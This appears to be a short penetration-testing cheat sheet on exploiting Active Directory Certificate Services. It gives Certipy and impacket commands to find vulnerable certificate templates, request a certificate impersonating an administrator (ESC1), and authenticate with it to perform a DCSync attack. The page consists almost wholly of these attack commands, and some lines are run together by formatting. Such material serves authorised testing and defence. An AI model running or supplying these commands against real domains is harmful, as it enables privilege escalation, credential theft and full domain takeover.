ADCS Exploitation
Install
pipx install git+https://github.com/ly4k/CertipyLocate Vulnerable Templates
certipy find -u $ADUSER@$ADDOMAIN -dc-ip $ADCONTROLLER -stdout -vulnerablePrivilege Escalation Vulnerabilities
ESC1
# Request Cert
certipy req -u $ADUSER@$ADDOMAIN -ca <CA> -template <TEMPLATE NAME> -upn <[email protected]m>
# Use Cert for DCSync attack on SAN (upn)
sudo certipy auth -pfx <administrator.pfx> -dc-ip $ADCONTROLLER# Get Kerberos TGT
impacket-getTGT $ADDOMAIN/$ADUSER -dc-ip <DC>
export KRB5CCNAME=$ADUSER.ccache
# Request Cert
certipy req -k -no-pass -target ADCS-01.EXAMPLE.COM -ca ADCS-01 -template 'Temp-User' -upn <[email protected]m>
# Use Cert for DCSync attack on SAN (upn)
sudo certipy auth -pfx <administrator.pfx> -dc-ip $ADCONTROLLERESC8
References
Last updated